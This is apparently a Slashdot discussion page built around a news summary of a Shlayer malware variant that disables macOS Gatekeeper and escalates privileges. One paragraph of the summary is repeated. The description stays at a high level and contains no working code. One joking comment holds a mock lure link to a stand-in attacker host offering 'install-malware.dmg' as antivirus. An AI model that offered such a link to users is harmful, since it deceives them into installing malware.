Shlayer Malware Disables macOS Gatekeeper To Run Unsigned Payloads (bleepingcomputer.com) 91
A new variant of the multi-stage Shlayer malware known to target macOS users has been observed in the wild, now being capable to escalate privileges using a two-year-old technique and to disable the Gatekeeper protection mechanism to run unsigned second stage payloads. Bleeping Computer reports: This new Shlayer variant unearthed by Carbon Black's Threat Analysis Unit (TAU) targets all macOS releases up to the latest 10.14.3 Mojave, and will arrive on the targets' machines as a DMG, PKG, ISO, or ZIP files, some of them also signed with a valid Apple developer ID to make them look legitimate. Shlayer samples found by TAU also use malicious shell scripts to download additional payloads just like older installments did, and, in the case of samples distributed as DMG images, will surreptitiously launch a .command script in the background after the user launches the fake Flash installer. The malicious script included in the DMG is encoded using base64 and will decrypt a second AES encrypted script which will be executed automatically after being decrypted.
One it successfully downloads the second stage malware payload, Shlayer will "to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline," presented by Patrick Wardle in his Death by 1000 Installers talk at DEFCON 2017. The next step is to download extra payloads which all contain adware according to TAU and it makes sure they'll be able to run on the compromised Mac by disabling the Gatekeeper protection mechanism. After this is accomplished, all extra payloads downloaded and launched by Shlayer will be seen as whitelisted software because the OS will no longer check if they are signed with an Apple developer ID. Also, just in case the malware is not able to disable Gatekeeper on the infected Mac, some of the second stage payloads are also signed with valid developer IDs.
One it successfully downloads the second stage malware payload, Shlayer will "to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline," presented by Patrick Wardle in his Death by 1000 Installers talk at DEFCON 2017. The next step is to download extra payloads which all contain adware according to TAU and it makes sure they'll be able to run on the compromised Mac by disabling the Gatekeeper protection mechanism. After this is accomplished, all extra payloads downloaded and launched by Shlayer will be seen as whitelisted software because the OS will no longer check if they are signed with an Apple developer ID. Also, just in case the malware is not able to disable Gatekeeper on the infected Mac, some of the second stage payloads are also signed with valid developer IDs.
Re: but but but (Score:1)
This still requires a user to actively run a process. Hardly the stuff of the windows driveby malware.
Re: (Score:1)
Except this is an actual software installer. You've got to type your password. It isn't like a .doc vulnerability.
Re: but but but (Score:1)
Not a virus. Requires you to download and open it. No machine or OS is protected against stupid users.
I thought the whole idea of Apple-vetted (Score:2)
Clearly these developer ids should be invalidated (revoked) in a MacOS update, no?
Re: (Score:3)
Developer ids and signed software was to provide a level of assurance to the downloader user.
No they weren't. It's to confirm that the software came from the identified party, it doesn't provide any guarantee that the enclosed software is all nice and pretty and not going to completely fuck over your computer. This is the same problem is SSL/TLS certificates on HTTPS sites - people mistakenly assume trust where it's only conveying identity.
Clearly these developer ids should be invalidated (revoked) in a MacOS update, no?
Yes.
Comment removed (Score:4, Informative)
Re: (Score:1)
2 issues it seams (Score:2)
So, this would infect people even if Apple fixes the bug right? The fact they can side step checks using signed code is a big deal by itself.
I'm guessing those devel's got cracked, and have some work ahead of them...
Re: 2 issues it seams (Score:1)
If it uses sudo to escalate privileges, feels to me the right thing is to uninstall sudo (can you in a mac?) And stick with su if root access is dear ly needed.
Re: (Score:3)
So, this would infect people even if Apple fixes the bug right?
I believe the 2017 security_authtrampoline issue was patched quite some time ago. Assuming that’s the case, this would require some additional social engineering to work. However, as we’ve seen many times before, people are almost always the weakest link in the security chain - so...
Re: (Score:1)
It was fixed after Wardle reported it to Apple, more than a year ago. Macs are protected if they are running the current 10.12 (Sierra) 10.13 (High Sierra), or 10.14 (Mojave).
Re: (Score:2)
Presumably Apple will be blacklisting the compromised developer IDs in the very near future, if they haven't done so already.
Re: (Score:2)
Won't help most people who were dumb enough to run this program. You have to a) choose to pirate security software via bittorrent, b) not notice the version number is years out-of-date, and c) not realize the executable code in the files you downloaded are actually Windows code. Adding d) click the "run non-signed software" button is not gonna be terribly useful.
Re: (Score:2)
The Fix is here... (Score:1)
Just download this executable to secure your mac: <a href="badguysite.org/install-malware.dmg">Antivirus</a>
What about a public registry (Score:2)
And a requirement that developers buy into an insurance plan so that if their developer id is used for malware, end-users can file a class-action lawsuit against the developer and recover damages via the insurance pool.
Or better yet, rather than a cumbersome class-action, have a pre-setup mediation service administered by Apple.
Re: (Score:2)
Re: (Score:1)
Right as rain as usual APK. So much that the troll morons that stalk you as unidentifiable anonymous and impersonate you are out in force.
Re: (Score:1)
APK you really shouldn't talk to your self, especially in the 3rd person. It doesn't make you look mentally stable but then even your regular posts don't make you look mentally stable.
Classic Trojan horse? (Score:2)
I don't know what Apple can do about something like this. A valid dev ID can allow software to run as root with full root privs. The only way I can see Apple fixing this is moving the Gatekeeper options to the same place where one sets the T2 boot security via recovery mode, where it is inaccessible in the normal OS.
(IIRC) Ages ago, Sprint required signed code on all their smartphones (this was pre-iPhone, and smartphones were a different type of device than PDA-phones, so they had mainly Windows Mobile o
Re: (Score:2)
In many cases these certs are gotten by posing as a legitimate developer to Apple and then signing malware with it. They actually pay the $99, often with a stolen credit card and will even publish "legitimate" apps (often rebranded/recompiled crap) before starting a campaign.
Re: (Score:2)
In other news... (Score:1)
People just bypass the sandbox anyway since many freely available packages aren't signed.